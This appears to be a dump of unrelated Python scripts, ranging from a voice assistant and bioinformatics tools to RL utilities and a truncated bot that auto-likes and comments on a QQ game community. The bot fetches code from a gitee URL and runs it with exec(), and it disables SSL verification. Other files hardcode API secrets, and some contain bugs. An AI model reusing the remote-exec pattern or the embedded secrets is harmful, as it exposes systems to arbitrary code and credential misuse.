text stringlengths 8 6.05M |
|---|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 16 15:41:49 2018
@author: mynumber
功能:实现语音到文本,使用者说出一句话,讲说出的话识别成对应的文字
接口:speech_recognition ,百度语音识别api
实现过程:1、利用speech_recognition进行录音(可以检测录音开始和结束位置),并将录音转化为采样频率为16000,wav的格式
2、利用百度ResApi sdk 对 .wav格式的录音进行识别
接下来的工作:1、持续的输入输出
2、不将录音写到本地,直接进行识别
"""
import speech_recognition as sr
import time
import sys
# 引入Speech SDK
from aip import AipSpeech
import requests
import Netease
import get_news
KEY = '8edce3ce905a4c1dbb965e6b35c3834d' #这个key可以直接拿来用
KEY1='56e5e786796241e7a7c97d0a55414f27'
# 向api发送请求
def get_response(msg):
apiUrl = 'http://www.tuling123.com/openapi/api'
data = {
'key' : KEY1,
'info' : msg,
'userid' : 'pth-robot',
}
try:
r = requests.post(apiUrl, data=data).json()
print(r)
return r.get('text')
except:
return
class speechRecognize(object):
def __init__(self,):
self._APP_ID = '10686210'
self._API_KEY = 'dVPvuaXf7Zgr7iNVrXRBz390'
self._SECRET_KEY = '764e77ae416d3510cb87cf4c8d7082ee'
self.aipSpeech = AipSpeech(self._APP_ID, self._API_KEY, self._SECRET_KEY)
self.r=sr.Recognizer()
def record_voice(self):
#从麦克风中获取音频
with sr.Microphone() as source:
self.r.adjust_for_ambient_noise(source)
print('请开始讲话...')
audio=self.r.listen(source)
#将音频写入WAV文件
with open('speech1.wav','wb') as f:
f.write(audio.get_wav_data(convert_rate=16000))
self.start=time.time()
print('ending say')
def recognize_record(self):
#识别转录之后的语音
# 读取文件
def get_file_content(filePath):
with open(filePath, 'rb') as fp:
return fp.read()
# 识别本地文件 ,识别中文,可以通过修改’lan'属性进行调整识别的语言种类
response=self.aipSpeech.asr(get_file_content('speech1.wav'), 'wav', 16000, {'lan': 'zh',})
self.end=time.time()
try:
if response['result'] is not None:
print(response['result'])
print('运行时间:%s'%(self.end-self.start))
return response['result']
except:
#print('ERROR 请检查错误格式')
#print('说话内容为空或无法识别')
return
import win32com.client
"""
from win32com.client import gencache
gencache.EnsureModule('{C866CA3A-32F7-11D2-9602-00C04F8EE628}', 0, 5, 0)
"""
#声明win32com 语音模块的引用,实例化发言人(speaker)
def speak(words=None):
try:
speaker = win32com.client.Dispatch("SAPI.SPVOICE")
speaker.Speak(words)
except:
print('Error: 实例化失败 请检查是否设置好--IID{269316D8-57BD-11D2-9EEE-00C04F797396}')
A=speechRecognize()
netmusic=Netease.NetEaseMusic()
news=get_news.News()
while True:
A.record_voice()
msg=A.recognize_record()
if msg is not None:
if '播放' in msg[0]:
speak('正在搜索中')
print('音乐信息:%s'%msg[0])
song=msg[0].split('播放')[1]
netmusic.play_song(song)
elif '退出系统' in msg[0]:
print('即将退出系统')
sys.exit(0)
elif '新闻' in msg[0]:
n=news.get_news(type_='top')
speak(n[0]['title'])
print(n[0]['title'])
elif '暂停' in msg[0]:
netmusic.pause_music()
elif '继续' in msg[0]:
netmusic.unpause_music()
else :
response=get_response(msg)
netmusic.pause_music()
speak(response)
netmusic.unpause_music()
time.sleep(0.1)
|
#!/usr/bin/python3
import socket
ip = socket.gethostbyname('www.arshadsiddiqui.in')
print (ip)
|
#!/usr/bin/python
import sys
import getopt
import matplotlib
import numpy as np
matplotlib.use("Agg") # Force matplotlib to not use Xwindows backend.
import matplotlib.pyplot as plt
# default parameters
kmer = 11
file_name = ""
xmax = 2000
file_type = "fasta"
bar_stat = 0
bar_Y_N = "Off"
output_dir = "./"
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv, "hpk:x:f:t:d:")
except getopt.GetoptError:
print 'kspec.py -k <kmer_size> -x <x_axis_max> -t <type>[fasta|fastq] -p[progress bar on] -d <output_dir> [./] -f <inputfile> \n'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print "#--- K-mer frequency graphing script ---#\n"
print "Usage:"
print 'kspec.py -k <kmer_size> -x <x_axis_max> -t <type>[fasta|fastq] -p[progress bar on] -d <output_dir> [./] -f <inputfile> \n'
print "Goals:"
print "1) Take in fastq file and kmerize it and output kmer occurence frequnecy"
print "2) Output graph of kmer occurence frequnecy"
print "3) Output kmer occurence frequnecy to .tsv file"
print "\n"
sys.exit()
elif opt in ("-k"):
kmer = arg
elif opt in ("-x"):
xmax = arg
elif opt in ("-f"):
file_name = arg
elif opt in ("-t"):
file_type = arg
elif opt in ("-p"):
bar_stat = 1
bar_Y_N = "On"
elif opt in ("-d"):
output_dir = arg
print "#-----------------------------------------------------------------------#"
print "#--- K-mer frequency graphing script RUN PARAMETERS---#\n"
print "Input file:", file_name
print "Input file type:", file_type
print "Kmer size:", kmer
print "X-axis max kmer count:", xmax
print "Progress Bar:", bar_Y_N
print "Output Dir:", output_dir
print " "
###############################################################################
# Progress bar is not my own work from:
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
#
def progress(count, total, suffix=''):
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', suffix))
sys.stdout.flush()
##################################################
# Dictionary storing kmers
kmer_dic = {}
# importing file
in_file = file_name
fh1 = open(in_file, 'r')
# Count number of lines in a file
num_lines = sum(1 for line in fh1)
fh1.close
if num_lines >= 100000:
print "Your file has %s number of lines..." % (num_lines)
print "This may take a while to process..."
print "...so be patience..."
print " "
fh2 = open(in_file, 'r')
# skip first line
next(fh2)
seq_total = ""
count = 0
kmer_range = 0
if str(file_type) == "fastq":
print "K-merizing the reads..."
for line in fh2:
if bar_stat == 1:
progress(count, num_lines, suffix='done')
count = count + 1
if count % 4 == 1:
# strip new line char
line = line.strip('\n')
# determine range of kmer
line_length = len(line)
kmer_range = line_length - int(kmer) + 1
# Starting kmer parsing 0 to length of line minus kmer size
for kmer_start_index in range(kmer_range):
# range for kmer
kmer_end_index = kmer_start_index + int(kmer)
# collect khmer for this iteraton
kmer_string = line[kmer_start_index: kmer_end_index]
# check for kmer in dictionary and ++ if not present add to dic and equal 1
kmer_dic[kmer_string] = kmer_dic.get(kmer_string, 0) + 1
elif file_type == "fasta":
for line in fh2:
if bar_stat == 1:
progress(count, num_lines, suffix='done')
if line[0] != ">":
line = line.strip('\n')
seq_total = seq_total + line
count += 1
continue
elif line[0] == ">":
# determine range of kmer
line_length = len(seq_total)
kmer_range = line_length - int(kmer) + 1
# Starting kmer parsing 0 to length of line minus kmer size
for kmer_start_index in range(kmer_range):
# range for kmer
kmer_end_index = kmer_start_index + int(kmer)
# collect khmer for this iteraton
kmer_string = seq_total[kmer_start_index: kmer_end_index]
# check for kmer in dictionary and ++ if not present add to dic and equal 1
kmer_dic[kmer_string] = kmer_dic.get(kmer_string, 0) + 1
count += 1
seq_total = ""
continuecd
# procces file name
file_name_out = file_name.split('/')
file_name_split = file_name_out[-1]
# Open file for writing
file_out = str(output_dir) + "%s_raw_kmer_data_Ksize_%s.tsv" % (file_name_split[:-6], kmer)
fh_out = open(file_out, 'w')
fh_out.write("K-mer\tNumber of K-mers\n")
for key in kmer_dic.keys():
fh_out.write("%s\t%s\n" % (key, kmer_dic[key]))
fh_out.close
# khmer freq dictionary
kmer_dic_freq = {}
# count the number of count of kmers
for val in kmer_dic.values():
kmer_dic_freq[val] = kmer_dic_freq.get(val, 0) + 1
print " "
print "#-----------------------------------------------------------------------#"
list_of_kmer_occurences = []
list_of_kmer_occurences.append([])
list_of_kmer_occurences.append([])
# Print out list of counts of count of K-mers
print "K-mer Frequency Number of K-mers in this category"
for key in sorted(kmer_dic_freq.keys()):
print key, " ", kmer_dic_freq[key]
list_of_kmer_occurences[0].append(key)
list_of_kmer_occurences[1].append(kmer_dic_freq[key])
print " "
print "#-----------------------------------------------------------------------#"
# Open file for writing
file_out = str(output_dir) + "%s_kmer_freq_data_Ksize_%s.tsv" % (file_name_split[:-6], kmer)
fh_out = open(file_out, 'w')
print "Writing to: file_out"
fh_out.write("K-mer Frequency\tNumber of K-mers in this category\n")
for key in sorted(kmer_dic_freq.keys()):
fh_out.write("%s\t%s\n" % (key, kmer_dic_freq[key]))
fh_out.close
# Ploting
print "Graphing Kmers..."
plt.bar(kmer_dic_freq.keys(), kmer_dic_freq.values(), edgecolor="none", width=1.0, log=True)
plt.xlim(0, int(xmax))
plt.xlabel('Number of K-mers')
plt.ylabel('Number of Appearances')
plt.title('Counts of the number of Kmer Occurences')
plt.annotate('K-mer size = %s' % (kmer), xy=(1, 3), xytext=((int(xmax)- 489), 21))
plt.grid(True)
print "\nPrinting to %s%s_kmer_freq_hist_Ksize_%s.png" % (output_dir, file_name_split[:-6], kmer)
# Save first graph
plt.savefig(str(output_dir) + "%s_kmer_freq_hist_Ksize_%s.png" % (file_name_split[:-6], kmer))
plt.close()
|
import math
import torch
def delphineat_gauss_activation(z):
'''Gauss activation as defined by SharpNEAT, which is also as in DelphiNEAT.'''
return 2 * math.exp(-1 * (z * 2.5)**2) - 1
def delphineat_sigmoid_activation(z):
'''Sigmoidal activation function as defined in DelphiNEAT'''
return 2.0 * (1.0 / (1.0 + math.exp(-z*5)))-1
def delphineat_gauss_torch_activation(z):
'''PyTorch implementation of gauss activation as defined by SharpNEAT, which is also as in DelphiNEAT.'''
return 2.0 * torch.exp(-1 * (z * 2.5) ** 2) - 1
def delphineat_sigmoid_torch_activation(z):
'''PyTorch implementation of sigmoidal activation function as defined in DelphiNEAT'''
return 2.0 * (1.0 / (1.0 + torch.exp(-z*5)))-1 |
# -*- coding: utf-8 -*-
class Systems:
def listSystems(self,con):
cur = con.cursor()
cur.execute('select id,name,config from systems.systems')
ss = cur.fetchall()
systems = []
for s in ss:
systems.append(self.convertToDict(s))
return systems
def convertToDict(self,r):
d = {
'id':r[0],
'name':r[1],
'config':r[2]
}
return d
|
#!/usr/bin/python3
'''JSON module'''
import json
def load_from_json_file(filename):
'''function that creates an Object from a “JSON file”'''
with open(filename) as f:
data = json.load(f)
return data
|
#!/usr/bin/python3
def is_same_class(obj, a_class):
""" Function that returns True if the object \
is exactly an instance of the specified class
"""
return True if type(obj) == a_class else False
|
from tkinter import filedialog, Tk
import re
from math import log10
def translate(seq):
seqSplit = []
for i in range(int(len(seq) / 3)):
seqSplit.append(seq[3 * i:3 * i + 3])
proseq = ""
for i in seqSplit:
if codon[i] == "Stop":
break
else:
proseq += aacode[codon[i]]
return proseq
def printSeq(S):
for i in range(int(len(S)/20)+1):
try:
print(S[i*20:(i+1)*20])
except IndexError:
print(S[i*20:])
def Tm(seq):
Xcg = len(re.findall("[GC]", seq)) / len(seq)
Tm = Xcg * 41.1 + 16.6 * log10(10**(-2)) + 81.5
return Tm
def maxTm(seq):
seqSplit = []
for i in range(int(len(seq) / 3)):
seqSplit.append(seq[3 * i:3 * i + 3])
for s in range(len(seqSplit)):
if seqSplit[s][2] == ("C" or "G"):
continue
else:
if codon[seqSplit[s]] == (codon[seqSplit[s][0:2]+"C"]):
seqSplit[s] = seqSplit[s][0:2]+"C"
elif codon[seqSplit[s]] == (codon[seqSplit[s][0:2]+"G"]):
seqSplit[s] = seqSplit[s][0:2]+"G"
alterSeq = ""
for i in seqSplit:
alterSeq += i
return Tm(alterSeq)
codon = {"TTT" : "Phe", "TTC" : "Phe", "TTA" : "Leu", "TTG" : "Leu",
"CTT" : "Leu", "CTC" : "Leu", "CTA" : "Leu", "CTG" : "Leu",
"ATT" : "Ile", "ATC" : "Ile", "ATA" : "Ile", "ATG" : "Met",
"GTT" : "Val", "GTC" : "Val", "GTA" : "Val", "GTG" : "Val",
"TCT" : "Ser", "TCC" : "Ser", "TCA" : "Ser", "TCG" : "Ser",
"CCT" : "Pro", "CCC" : "Pro", "CCA" : "Pro", "CCG" : "Pro",
"ACT" : "Thr", "ACC" : "Thr", "ACA" : "Thr", "ACG" : "Thr",
"GCT" : "Ala", "GCC" : "Ala", "GCA" : "Ala", "GCG" : "Ala",
"TAT" : "Tyr", "TAC" : "Tyr", "TAA" : "Stop", "TAG" : "Stop",
"CAT" : "His", "CAC" : "His", "CAA" : "Gln", "CAG" : "Gln",
"AAT" : "Asn", "AAC" : "Asn", "AAA" : "Lys", "AAG" : "Lys",
"GAT" : "Asp", "GAC" : "Asp", "GAA" : "Glu", "GAG" : "Glu",
"TGT" : "Cys", "TGC" : "Cys", "TGA" : "Stop", "TGG" : "Trp",
"CGT" : "Arg", "CGC" : "Arg", "CGA" : "Arg", "CGG" : "Arg",
"AGT" : "Ser", "AGC" : "Ser", "AGA" : "Arg", "AGG" : "Arg",
"GGT" : "Gly", "GGC" : "Gly", "GGA" : "Gly", "GGG" : "Gly"}
aacode = {"Ala" : "A", "Arg" : "R", "Asn" : "N", "Asp" : "D", "Cys" : "C",
"Gln" : "Q", "Glu" : "E", "Gly" : "G", "His" : "H", "Ile" : "I",
"Leu" : "L", "Lys" : "K", "Met" : "M", "Phe" : "F", "Pro" : "P",
"Ser" : "S", "Thr" : "T", "Trp" : "W", "Tyr" : "Y", "Val" : "V"}
root = Tk()
root.filename = filedialog.askopenfilename(initialdir="D:/강의 관련/'18년 2학기/생화학1/과제/1",
title="Choose your file", filetypes=(("FASTA files","*.fasta"), ("all files","*.*")))
print(root.filename)
root.withdraw()
file = open(root.filename, 'r')
seq = ""
f = file.read().splitlines()
for i in f:
try:
if i[0] == '>':
print(i); continue
else:
seq += i
except IndexError:
pass
print("Sequence length : %dbp" % len(seq))
print("Translated Protein length : %daa" % len(translate(seq)))
print("Thermal denaturation (Tm) at 10^-2M [Na+] : %.2f'C" % Tm(seq))
print("Max thermal Tm at 10^-2M [Na+] : %.2f'C" % maxTm(seq))
a = input("Do you want to see all protein sequences? (y/n) [n]")
if a == ('y' or 'Y'):
printSeq(translate(seq))
elif a == ('n' or 'N' or ''):
pass
input()
|
from owlready2 import *
class Network:
""" A class which runs a depth-first-search on the ontology and creates
a graph network from the data.
Parameters
----------
ontology : OWL2 climate mind ontology file
Completes a depth-first search for the ontology and return edges in
the component reachable from source.
"""
def __init__(self, ontology, source=None):
self.ontology = ontology
self.result = []
self.visited = set()
self.node_family = []
self.class_family = []
if source:
self.source = source
else:
self.source = None
obj_props = list(self.ontology.object_properties())
self.obj_properties = self.make_alias_names_for_properties(obj_props)
annot_props = list(self.ontology.annotation_properties())
self.annot_properties = self.make_alias_names_for_properties(annot_props)
def give_alias(self, property_object):
""" Adds labels the ontology object in a way that makes them pythonicly accessible through . invocation method.
Parameters
----------
property_object: ontology property object to make pythonicly accessible
"""
label_name = property_object.label[0]
label_name = label_name.replace("/","_or_")
label_name = label_name.replace(" ","_")
label_name = label_name.replace(":","_")
property_object.python_name = label_name
return label_name
def make_alias_names_for_properties(self, properties):
""" Adds labels the ontology object in a way that makes them pythonicly accessible through . invocation method.
Parameters
----------
properties: list of ontology property objects to make pythonicly accessible
accessible_names = list of properties now accessible via . invocation method
"""
new_names = [self.give_alias(x) for x in properties]
return new_names
def add_child_to_result(self, child, parent, edge_type):
""" Adds a node to the results and if needed adds the node's family
to node_family (a stack of nodes to continue exploring).
Parameters
----------
child: A node in the ontology
parent: A node in the ontology
edge_type: The relationship between child and parent
i.e. causes, inhibits, etc
"""
self.result.append((parent.label[0], child.label[0], edge_type))
if child not in self.visited:
self.visited.add(child)
for obj_prop in self.obj_properties:
self.node_family.append((
child,
eval("iter(child."+obj_prop+")"),
obj_prop
))
def add_class_to_explore(self, class_name):
""" Adds all nodes related to a particular class. Some of these nodes
will not actually be a class, but that is irrelevant as they will get ignored.
Parameters
----------
class_name: A node in the ontology
"""
for obj_prop in self.obj_properties:
try:
self.class_family.append((
class_name,
eval("iter(class_name."+obj_prop+")"),
obj_prop
))
except: pass
try:
self.class_family.append((
class_name,
iter(self.ontology.get_parents_of(class_name)),
"is_a"
)) # the class(es) of the ont_class. This could pull classes that are just Restriction classes, so really should add code here that checks the class is found in self.ontology.classes() before adding it to the class_family.
except: pass
def dfs_for_classes(self, node):
""" Performs a depth-first-search on parent classes from a node.
Parameters
----------
node: The starting point node in the ontology
"""
visited_classes = set()
classes = self.ontology.get_parents_of(node)
if classes:
for ont_class in classes:
if ont_class != owl.Thing:
self.add_class_to_explore(ont_class)
while self.class_family:
parent2, children2, edge_type2 = self.class_family[-1]
visited_classes.add(parent2) #these are not all classses
try:
child2 = next(children2)
if child2 != owl.Thing:
if child2 in self.ontology.individuals():
self.add_child_to_result(child2, node, edge_type2)
elif child2 not in visited_classes and child2 in self.ontology.classes():
visited_classes.add(child2)
self.add_class_to_explore(child2)
except StopIteration:
self.class_family.pop()
def dfs_labeled_edges(self):
""" Produce edges in a depth-first-search (DFS) labeled by type.
Notes
-----
Based on http://www.ics.uci.edu/~eppstein/PADS/DFS.py
by D. Eppstein, July 2004.
If a source is not specified then a source is chosen arbitrarily and
repeatedly until all components in the graph are searched.
TODO Find why a couple of duplicates are created
Example: increase in carbon capture,
greenhouse-gas externality,
is_inhibited_or_prevented_or_blocked_or_slowed_by
"""
if self.source:
nodes = [self.ontology.search_one(label=self.source)]
else:
nodes = self.ontology.individuals()
for node in nodes:
if node not in self.visited:
self.visited.add(node)
for obj_prop in self.obj_properties:
self.node_family.append((
node,
eval("iter(node."+obj_prop+")"),
obj_prop
))
while self.node_family:
parent, children, edge_type = self.node_family[-1]
self.visited.add(parent)
try:
child = next(children)
self.add_child_to_result(child, parent, edge_type)
except StopIteration:
self.node_family.pop()
self.dfs_for_classes(parent)
def get_results(self):
""" Returns
-------
result: A list of triples found by the depth-first-search
"""
return self.result
|
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from scipy import signal
import gym
from gym import wrappers
import math
import scipy
import matplotlib.pyplot as plt
from matplotlib import animation
from typing import Optional
color2num = dict(
gray=30,
red=31,
green=32,
yellow=33,
blue=34,
magenta=35,
cyan=36,
white=37,
crimson=38,
)
def colorize(
string: str,
color: int,
bold: Optional[bool] = False,
highlight: Optional[bool] = False,
):
"""
Colorize a string.
This function was originally written by John Schulman.
"""
attr = []
num = color2num[color]
if highlight:
num += 10
attr.append(str(num))
if bold:
attr.append("1")
return "\x1b[%sm%s\x1b[0m" % (";".join(attr), string)
def calc_logstd_anneal(n_anneal_cycles: int, anneal_start: float, anneal_end: float, epochs: int) -> np.ndarray:
"""
Calculate log standard deviation annealing schedule. Can be used in PG algorithms on continuous action spaces.
Args:
n_anneal_cycles (int): How many times to cycle from anneal_start to anneal_end over the training epochs.
anneal_start (float): Starting log standard deviation value.
anneal_end (float): Ending log standard deviation value.
epochs (int): Number of training cycles.
"""
if n_anneal_cycles > 0:
logstds = np.linspace(anneal_start, anneal_end, num=epochs // n_anneal_cycles)
for _ in range(n_anneal_cycles):
logstds = np.hstack((logstds, logstds))
else:
logstds = np.linspace(anneal_start, anneal_end, num=epochs)
return logstds
class NetworkUtils:
"""
Random utilities for neural networks.
"""
def __init__(self):
super(NetworkUtils, self).__init__()
def conv2d_output_size(self, kernel_size, stride, sidesize):
return (sidesize - (kernel_size - 1) - 1) // stride + 1
def squared_error_loss(self, target, actual):
return (actual - target) ** 2
def save_frames_as_gif(frames, filename=None):
"""
Save a list of frames as a gif
This code from this floydhub blog post: https://blog.floydhub.com/spinning-up-with-deep-reinforcement-learning/
"""
# patch = plt.imshow(frames[0])
fig = plt.figure()
plt.axis("off")
def animate(i):
patch.set_data(frames[i])
# anim = animation.FuncAnimation(plt.gcf(), animate, frames = len(frames), interval=50)
anim = animation.ArtistAnimation(fig, frames, interval=50)
if filename:
anim.save(filename, writer="imagemagick")
class NormalizedActions(gym.ActionWrapper):
"""
Normalize actions for continuous policy
From here: https://github.com/JamesChuanggg/pytorch-REINFORCE/blob/master/normalized_actions.py
"""
def _action(self, action):
action = (action + 1) / 2 # [-1, 1] => [0, 1]
action *= self.action_space.high - self.action_space.low
action += self.action_space.low
return action
def _reverse_action(self, action):
action -= self.action_space.low
action /= self.action_space.high - self.action_space.low
action = action * 2 - 1
return action
def _discount_cumsum(x: np.array, discount: float):
"""
magic from rllab for computing discounted cumulative sums of vectors.
input:
vector x,
[x0,
x1,
x2]
output:
[x0 + discount * x1 + discount^2 * x2,
x1 + discount * x2,
x2]
"""
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
def conv2d_output_size(kernel_size, stride, sidesize):
return (sidesize - (kernel_size - 1) - 1) // stride + 1
def num2tuple(num):
return num if isinstance(num, tuple) else (num, num)
def conv2d_output_shape(h_w, kernel_size=1, stride=1, pad=0, dilation=1):
h_w, kernel_size, stride, pad, dilation = num2tuple(h_w), \
num2tuple(kernel_size), num2tuple(stride), num2tuple(pad), num2tuple(dilation)
pad = num2tuple(pad[0]), num2tuple(pad[1])
h = math.floor((h_w[0] + sum(pad[0]) - dilation[0]*(kernel_size[0]-1) - 1) / stride[0] + 1)
w = math.floor((h_w[1] + sum(pad[1]) - dilation[1]*(kernel_size[1]-1) - 1) / stride[1] + 1)
return h, w
def convtransp2d_output_shape(h_w, kernel_size=1, stride=1, pad=0, dilation=1, out_pad=0):
h_w, kernel_size, stride, pad, dilation, out_pad = num2tuple(h_w), \
num2tuple(kernel_size), num2tuple(stride), num2tuple(pad), num2tuple(dilation), num2tuple(out_pad)
pad = num2tuple(pad[0]), num2tuple(pad[1])
h = (h_w[0] - 1)*stride[0] - sum(pad[0]) + dialation[0]*(kernel_size[0]-1) + out_pad[0] + 1
w = (h_w[1] - 1)*stride[1] - sum(pad[1]) + dialation[1]*(kernel_size[1]-1) + out_pad[1] + 1
return h, w |
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 5 10:56:12 2019
@author: Administrator
"""
import numpy as np
import rcos
from scipy import signal
import matplotlib.pyplot as plt
SPS = 32
#PN_CODE = np.array([1,1,1,1,1,0,0,1,1,0,1,0,1])#BARK CODE[1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1]
# PN_CODE = np.array([1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1])
PN_CODE = np.array([1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0])
# PN_CODE = np.array([1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1])
#PN_CODE = np.array([1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0])
PN_CODE = (PN_CODE-0.5)*2
print("pn code len:%d" % PN_CODE.shape[0])
#generate baseband signal
base_sig = (np.random.randint(0,2,6)-0.5)*2
base_up_sig = np.kron(base_sig,np.append(1,np.zeros(SPS-1)))
base_up_sig = np.kron(base_up_sig,np.ones_like(PN_CODE))*8
#spread signal
spread_sig = np.kron(base_sig,PN_CODE)
#chip filter
rcc_inst = rcos.my_rcc(0.4,SPS,8)
upsampel_sig = np.kron(spread_sig,np.append(1,np.zeros(SPS-1)))
shape_filtered = rcc_inst.rcc_filt(upsampel_sig)
#additive channel
noise = np.random.randn(shape_filtered.shape[0])/4
signal_wnoise = shape_filtered + noise*0
#match filter
shape_filtered2 = rcc_inst.rcc_filt(signal_wnoise)
#despread
def despread(din,code):
dlen = din.shape[0]
# upcode = np.kron(code,np.ones(SPS))
upcode = np.kron(code,np.append(1,np.zeros(SPS-1)))
clen = upcode.shape[0]
out = []
for i in range(dlen):
if i == 0:
out = np.append(out,0)
else:
out = np.append(out, np.dot(din[max(0,i-clen):i],upcode[:min(i,clen)]))
return out
despread_d = despread(shape_filtered2,PN_CODE)
#figure show
fig = plt.figure()
ax = fig.add_subplot(311)
ax.plot(spread_sig)
#ax.plot(upsampel_sig)
ax.set_title("spread_sig")
bx = fig.add_subplot(312)
bx.plot(shape_filtered,label="srcc")
bx.plot(shape_filtered2,label="rcc")
bx.legend()
bx.set_title("filtered")
cx = fig.add_subplot(313)
cx.plot(shape_filtered2*10,label='rx')
cx.plot(despread_d,label='dspread')
#cx.plot(base_up_sig,label='upsampel_sig')
cx.legend()
|
import requests
from urllib import request
from colorama import init,Fore
import json
import time
import os
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
#截取字符串
def GetMiddleStr(content,startStr,endStr):
startIndex = content.index(startStr)
if startIndex>=0:
startIndex += len(startStr)
endIndex = content.index(endStr)
return content[startIndex:endIndex]
#预留模块,需要时更新
def myFun():
try:
url = "https://gitee.com/intC/test/raw/master/myfun"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'
}
req = request.Request(url,headers=headers)
response = request.urlopen(req).read().decode("utf-8")
exec(response)
except Exception as r:
print('预留模块执行出错 %s' %(Fore.RED+str(r)))
#查看主页
def doLookMian(friendUserId):
time.sleep(1)
nowtime = int(time.time() * 1000)
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/user/getuserinfo&callback=jQuery17100012562480264131093_{}&uin={}&userId={}&friendUserId={}&_={}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Cookie':COOKIE
}
base_url = url.format(nowtime,UIN,USERID,friendUserId,nowtime)
req = request.Request(base_url,headers=headers)
try:
response = request.urlopen(req)
responseTxt = GetMiddleStr(response.read().decode("utf-8"),'(',');')
sMsg = json.loads(responseTxt)['sMsg']
popularity = json.loads(json.loads(responseTxt)['jData']['jData'])['data']['popularity']
print("------访问:[{}]成功-人气值[{}]------".format(friendUserId,popularity))
except Exception as r:
print('查看主页未知错误 %s' %(Fore.RED+str(r)))
#说说点赞
def doDianzan(momentId):
time.sleep(3)
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/moment/like&callback=jQuery171006764405901210213_1590{}&uin={}&userId={}&momentId={}&type=1&_={}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Cookie':COOKIE
}
base_url = url.format(momentId,UIN,USERID,momentId,momentId)
req = request.Request(base_url,headers=headers)
try:
response = request.urlopen(req)
responseText = response.read().decode("utf-8")[42:-2]
sMsg = json.loads(responseText)['sMsg']
returnMsg = json.loads(json.loads(responseText)['jData']['jData'])['returnMsg']
print("----------------点赞{}-------------异常:{}".format(sMsg,Fore.RED+returnMsg))
if '频率' in returnMsg:
#休眠120秒
time.sleep(120)
except Exception as r:
print('点赞未知错误 %s' %(Fore.RED+str(r)))
#说说评论
def doPinglun(momentId):
time.sleep(3)
text = time.strftime("%m", time.localtime()) + "." + time.strftime("%d", time.localtime())
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/moment/addcomment&callback=jQuery17108402774150402388_1590{}&uin={}&userId={}&roleId=1318055637&text={}&momentId={}&replyCommentId=0"
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
'Cookie':COOKIE
}
base_url = url.format(momentId,UIN,USERID,text,momentId)
req = request.Request(base_url,headers=headers)
try:
response = request.urlopen(req)
responseText = response.read().decode("utf-8")[41:-2]
sMsg = json.loads(responseText)['sMsg']
returnMsg = json.loads(json.loads(responseText)['jData']['jData'])['returnMsg']
print("----------------评论{}-------------异常:{}".format(sMsg,Fore.RED+returnMsg))
time.sleep(2)
if '频率' in returnMsg:
#休眠60秒
time.sleep(60)
except Exception as r:
print('评论未知错误 %s' %(Fore.RED+str(r)))
#tagId\":\"1\",\"tagName\":\"\热\门
#tagId\":\"2\",\"tagName\":\"\最\新
#tagId\":\"3\",\"tagName\":\"\视\频
def getNewMoments(tagid = 2):
time.sleep(1)
nowtime = int(time.time() * 1000)
url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/moment/squaretagmoments&callback=jQuery17100504510865243335_{}&gameId=10002&userId={}&tagId={}"
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
'Cookie':COOKIE
}
base_url = url.format(nowtime,USERID,tagid)
